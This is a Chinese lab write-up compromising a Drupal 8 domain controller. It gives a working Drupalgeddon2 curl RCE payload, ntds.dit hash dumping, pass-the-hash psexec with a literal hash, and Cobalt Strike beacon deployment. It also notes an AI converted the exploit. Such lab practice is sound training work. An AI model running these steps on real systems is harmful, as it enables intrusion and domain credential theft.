XiaoW001靶场通关

5 阅读 2026-07-18
  • 靶场信息

  • 系统:Windows Server 2012 R2

  • 中间件:Apache

  • CMS:Drupal 8.3.0

  • 角色:AD域控制器

二.页面展示

  • 开始渗透

  • IP地址查看,输入arp-scan -l 获取靶机IP地址

目标是192.168.10.139,接下来进一步的渗透

  • 使用nmap进行端口扫描,输入nmap -sV -O 192.168.10.139

很明显,这个机器是AD域控制器+apache中间件的服务器,它开放了80端口,我们可以进一步的访问80端口渗透

3.打开浏览器输入192.168.10.139 查看网页

根据左下角可以看出来这是一个开源的CMS内容管理系统,为了实现漏洞利用,接下来通过Kali的工具获取它的相关信息

4..Kali运行命令whatweb

这是一个Drupal 8的CMS内容管理系统,也就是说可能存在远程代码执行漏洞

5..Kali运行命令:searchsploit Drupal 8

发现Drupal 8版本存在一个RCE远程代码执行,我们获取它的payload

6..Kali运行命令:searchsploit -m 44448

可以看到脚本保存到了kali的家目录,接下来运行payload

7..Kali执行命令 python3 ./44448.py

这里提示输入靶场的url,输入即可

提示不可用不要慌,因为payload是给linux机器写的,我们的可是Windows呀

输入cat ./44448.py

交给ai,让ai转换成为CURL执行代码命令

接下来替换IP和执行命令,通过exec执行有点问题,替换system就正常了

curl -X POST 'http://192.168.10.139/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \

-d 'form_id=user_register_form' \

-d '_drupal_ajax=1' \

-d 'mail[#post_render][]=system' \

-d 'mail[#type]=markup' \

-d 'mail[#markup]=dir C:'

可以看出来我执行了dir命令,返回了C盘目录,接下来向域控继续干!

8.尝试访问C盘的www文件夹

发现有一个备份文件,可以进行url拼接下载这个文件

9.Kali执行命令:wget http://192.168.10.139/xiaodomain-bak.zip

解压xiaodomain-bak.zip

是一个域账户备份信息,我们可以通过impackte工具dump它的哈希

10.Kali执行命令:impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

成功获取Administrator的NTLMV2哈希

11.Kali执行:impacket-psexec xiao/administrator@192.168.10.139 -hashes :3c573fe744b7aeb5aca9f4f36761b7d6 -codec gbk

成功获取System权限,接下来玩点好玩的

打开CS打枪工具

执行chmod 777 ./*

执行./teamserver 192.168.10.140 8888

打开cs客户端输入IP地址和8888密码

创建监听器

创建木马

导出后放入kali

Kali执行命令:impacket-psexec xiao/administrator@192.168.10.139 -hashes :3c573fe744b7aeb5aca9f4f36761b7d6 -c ./artifact_x64.exe

太好了,成功上线!